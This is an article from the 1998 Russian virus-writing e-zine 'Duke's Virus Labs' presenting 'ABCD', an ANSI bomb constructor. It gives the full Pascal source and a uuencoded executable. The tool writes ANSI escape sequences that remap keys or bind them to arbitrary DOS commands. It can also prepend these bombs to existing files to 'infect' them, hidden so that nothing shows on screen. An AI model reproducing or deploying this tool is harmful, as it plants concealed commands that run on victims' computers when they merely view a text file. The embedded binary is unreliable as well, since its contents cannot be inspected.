Magazine "Duke's Virus Labs"          Number 01          File 009
 ▄▄▄▄▄▄  ▄▄▄▄▄    ▄       ▄  ▄▄▄                  ▄▄▄▄▄   ▄▄▄▄▄▄
          █  ▀█▄  █       █   █          █  █       █
 ▀▀▀▀▀▀   █    █  ▀█     █▀   █        ▀▀█▀▀█▀▀     █     ▀▀▀▀▀▀
 ▄▄▄▄▄▄   █    █   ██   ██    █        ▄▄█▄▄█▄▄     █     ▄▄▄▄▄▄
          █  ▄█▀    █▄ ▄█     █    ▄█    █  █       █
 ▀▀▀▀▀▀  ▀▀▀▀▀       ▀▀▀     ▀▀▀▀▀▀▀              ▀▀▀▀▀   ▀▀▀▀▀▀

                ▄▄▄▄    ▄▄▄▄▄     ▄▄▄▄    ▄▄▄▄▄
               █    █   █    █   █    ▀   █    █
               █    █   █    █   █        █    █
               █▀▀▀▀█   █▀▀▀▀▄   █        █    █
               █    █   █    █   █    ▄   █    █
               ▀    ▀   ▀▀▀▀▀     ▀▀▀▀    ▀▀▀▀▀
                          version 1.0


   Предлагаю  вашему  вниманию  программу  ABCD  или  ANSI   Bomb
Constructor by Duke/SMF. Это простой, но удобный в обращении кон-
структор ANSI-бомб (как это видно из названия :) Он написан  спе-
циально для журнала DVL #1 в качестве демонстрационного примера к
статье об ANSI-бомбах. От описанных в этой  статье  конструкторов
его отличают :

1) Дата создания. Это новая разработка, по сравнению с  описанны-
   ми  в  статье  "Небольшое  пособие  по   ANSI-бомбам"    (файл
   dvl-01.005) ископаемыми монстрами.
2) Небольшой размер: 10469 байт в незапакованном виде и 7031 байт
   - запакованный LZEXE.
3) Основным преимуществом конструктора является то,  что  создан-
   ные им бомбы не оставляют "следов" на экране даже при просмот-
   ре рядовым просмотрщиком.

   Возможности конструктора:

1) Создание бомб, заменяющих одну клавишу другой (переименовываю-
   щих клавиши).
2) Создание бомб, заменяющих клавишу на DOS-команду (выполняющих
   DOS-команды).
3) Инфицирование файлов (инфицирование в начало файла).
4) Дополнение файлов.
5) Задание имени бомбы.

   Программа распространяется AS IS по стандарту FREE :)
   Жду ваших отзывов по любому поводу:  по  вопросу  модернизации
программы, сообщения о багах и глюках (мной ничего не  замечено),
и так далее. Присылайте новые бомбы и  конструкторы.
   Далее идут  исходный  текст  программы  и  UUE-коды  с  файлом
ABCD.EXE

===== Cut here ===== начало ABCD.PAS =====
program ANSI_Bomb_Constructor_by_Duke;
uses  crt;
const NumberMenu=4;
var   i,j:integer;
      TextMenu:array[1..NumberMenu] of string[35];
      ch:char;
      EndWork: boolean;
      b:text;                                        {файл-бомба}
      old:boolean;                        {признак инфицирования}
      bom,st,t:string;
{-----------------------}
procedure SetNoCursor;assembler;        {делаем курсор невидимым}
asm
  mov ah,01h
  mov ch,32
  mov cl,3
  int 10h
end;
{-----------------------}
procedure SetNormalCursor;assembler;      {делаем курсор видимым}
asm
  mov ah,01h
  mov ch,7
  mov cl,8
  int 10h
end;
{-----------------------}
procedure WriteMenu;                         {вывод пунктов меню}
begin
gotoxy(2,i*2);write(TextMenu[i])
end;
{-----------------------}
procedure Menu1;                       {пункт меню "О программе"}
begin
Window(23,6,57,15);
ClrScr;
writeln;
writeln(' ANSI Bomb Constructor by Duke/SMF');
writeln('           version  1.0           ');
writeln;
writeln;
writeln('  Написано специально для журнала ');
writeln('   "Duke''s Virus Labs" issue 01   ');
writeln;
writeln('            26-07-1998            ');
repeat until keypressed;
while keypressed do readkey;
end;
{-----------------------}
procedure Otvet(var ch:char);        {получение ответа на вопрос}
begin
  ch:='3';
  while (ch<>'1') and (ch<>'2') do ch:=readkey;
  textcolor(4);
  writeln(ch);
  textcolor(15);
end;
{-----------------------}
function Analiz(n:integer):string;
         {анализируются нажатые клавиши с кодом из двух символов}
begin
case n of
  59: analiz:='F1';
  60: analiz:='F2';
  61: analiz:='F3';
  62: analiz:='F4';
  63: analiz:='F5';
  64: analiz:='F6';
  65: analiz:='F7';
  66: analiz:='F8';
  67: analiz:='F9';
  68: analiz:='F10';
  71: analiz:='Home';
  72: analiz:='Стрелка Вверх';
  73: analiz:='Page Up';
  79: analiz:='End';
  80: analiz:='Стрелка Вниз';
  81: analiz:='Page Down';
  82: analiz:='Insert';
  else analiz:=':*)';
  end;
end;
{-----------------------}
procedure Klavisha;                    {обработка нажатых клавиш}
var kod:integer;
    c,ch:char;
begin
textcolor(4);
ch:=readkey;
kod:=0;
write('"');
if ord(ch)=0 then
  begin
  c:=readkey;
  kod:=ord(c);
  write(analiz(kod));
  end
else write(ch);
writeln('"');
write(b,ord(ch));
if kod<>0 then write(b,';',kod);
textcolor(15);
end;
{-----------------------}
procedure Bomba;            {общая часть - начало создания бомбы}
begin
writeln;
writeln('Для ответа на вопрос нажимайте клавишу, указанную в '+
                                                      'скобках');
writeln('рядом с выбранным вариантом ответа.');
writeln;
write('Записывать в новый файл(1) или инфицировать старый(2)? ');
Otvet(ch);
old:=false;
if ch='2' then old:=true;{признак того, что сейчас мы инфицируем}
write('Введите имя файла для записи бомбы : ');
textcolor(4);
readln(st);
textcolor(15);
if old=true then begin t:=st;st:='temp';end;
assign(b,st);{$I-}reset(b);{$I+}
if (ioresult=0) and (old=false) then
 {уже существует, но мы не инфицируем}
 begin
 write('Файл уже существует. Добавить(1) или перезаписать(2)? ');
 Otvet(ch);
 if ch='1' then append(b) else rewrite(b);
 end
else
  begin
  write('Введите имя бомбы (нажмите "Enter", если имя не '+
                                                    'нужно) : ');
  textcolor(4);
  readln(bom);
  textcolor(15);
  rewrite(b);
  if bom<>'' then writeln(b,#27,'[0m',bom);
  end;
end;
{-----------------------}
procedure Vihod;                      {завершение создания бомбы}
var g:text;
    s:string;
begin
writeln(b,#27,'[2J');
if old=true then
  begin
  assign(g,t);reset(g);
  while not eof(g) do
    begin
    readln(g,s);
    writeln(b,s);
    end;
  close(g);
  erase(g);
  close(b);
  rename(b,t);
  end
else close(b);
write('Нажмите любую клавишу для выхода в главное меню...');
repeat until keypressed;
while keypressed do readkey;
end;
{-----------------------}
procedure Menu2;             {пункт меню "Переименование клавиш"}
label lab1;
begin
Window(1,1,80,25);
TextColor(15);
TextBackGround(0);
ClrScr;
GotoXY(25,1);
writeln('**** Переименование клавиш ****');
Bomba;
window(1,8,80,25);
lab1:
writeln;
write('Нажмите клавишу, которую вы хотите изменить    :');
write(b,#27,'[');
Klavisha;
write(b,';');
write('Нажмите клавишу, НА которую вы хотите изменить :');
Klavisha;
writeln(b,'p');
write('Будем изменять другие клавиши (1=Да, 2=Нет) ? ');
Otvet(ch);
if ch='1' then goto lab1;
Vihod;
end;
{-----------------------}
procedure Menu3;             {пункт меню "Выполнение DOS-команд"}
var st:string;
label lab2;
begin
Window(1,1,80,25);
TextColor(15);
TextBackGround(0);
ClrScr;
GotoXY(25,1);
writeln('**** Выполнение DOS-команд ****');
Bomba;
window(1,8,80,25);
lab2:
textcolor(15);
writeln;
write('Нажмите клавишу, которую вы хотите изменить : ');
write(b,#27,'[');
Klavisha;
write(b,';');
write('Введите команду DOS : ');
textcolor(4);
readln(st);
writeln(b,'"',st,'";13p');
textcolor(15);
write('Будем добавлять другие команды (1=Да, 2=Нет) ? ');
Otvet(ch);
if ch='1' then goto lab2;
Vihod;
end;
{-----------------------}
begin
SetNoCursor;
TextMenu[1]:='         О программе         ';
TextMenu[2]:='    Переименование клавиш    ';
TextMenu[3]:='    Выполнение DOS-команд    ';
TextMenu[4]:='        Выход из ABCD        ';
EndWork:=false;
repeat
  TextBackGround(3);
  ClrScr;
  TextColor(4);
  GotoXY(24,3);
  writeln('ANSI Bomb Constructor by Duke/SMF');
  TextColor(15);
  Window(26,7,56,15); { тень около окна меню }
  TextBackGround(0);
  ClrScr;
  Window(25,6,55,14); { окно вывода меню }
  TextBackGround(7);
  ClrScr;
  TextColor(4);       { вывод меню }
  for i:=1 to NumberMenu do WriteMenu;
  i:=1;      { изменение цвета первого пункта меню }
  TextColor(14);
  TextBackGround(1);
  WriteMenu;
  repeat
    ch:=ReadKey;
    if ch=#0 then
             begin
             ch:=ReadKey;
             case ch of
               #72 : begin { стрелка Вверх }
                     TextColor(4);
                     TextBackGround(7);
                     WriteMenu;
                     dec(i);
                     if i<1 then i:=NumberMenu;
                     TextColor(14);
                     TextBackGround(1);
                     WriteMenu;
                     end;
               #80 : begin { стрелка Вниз }
                     TextColor(4);
                     TextBackGround(7);
                     WriteMenu;
                     inc(i);
                     if i>NumberMenu then i:=1;
                     TextColor(14);
                     TextBackGround(1);
                     WriteMenu;
                     end;
             end;
    end;
  until ch=#13;
  case i of
       1 : Menu1;
       2 : Menu2;
       3 : Menu3;
       4 : EndWork:=true;
       end;
Window(1,1,80,25);
until EndWork;
{Возвращаем на место все измененные параметры:}
TextBackGround(0);
TextColor(7);
ClrScr;
SetNormalCursor;
end.
===== Cut here ===== конец  ABCD.PAS =====
===== Cut here ===== начало ABCD.UUE =====
            Имя исходного файла : ABCD.EXE
                         Размер : 7031 (7Kb)
                  Дата создания : 26-Июл-98 18:15:08
               Дата кодирования : 26-Июл-98 18:15:50
                 Размер UU-кода : 11Kb
              Количество секций : 1
     Число строк в одной секции : 157


section 1 of file abcd.exe  < uuencode by Dos Navigator >

filetime 620401124
begin 644 abcd.exe
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
M5Q%B$7D1E!&G$:L2D1>K&*`:7")W(HTBK"(`````````````````````````
+````````````````
`
end
sum -r/size 26954/7031 entire input file
===== Cut here ===== конец  ABCD.UUE =====
-------------------------<end of file>--------------------------
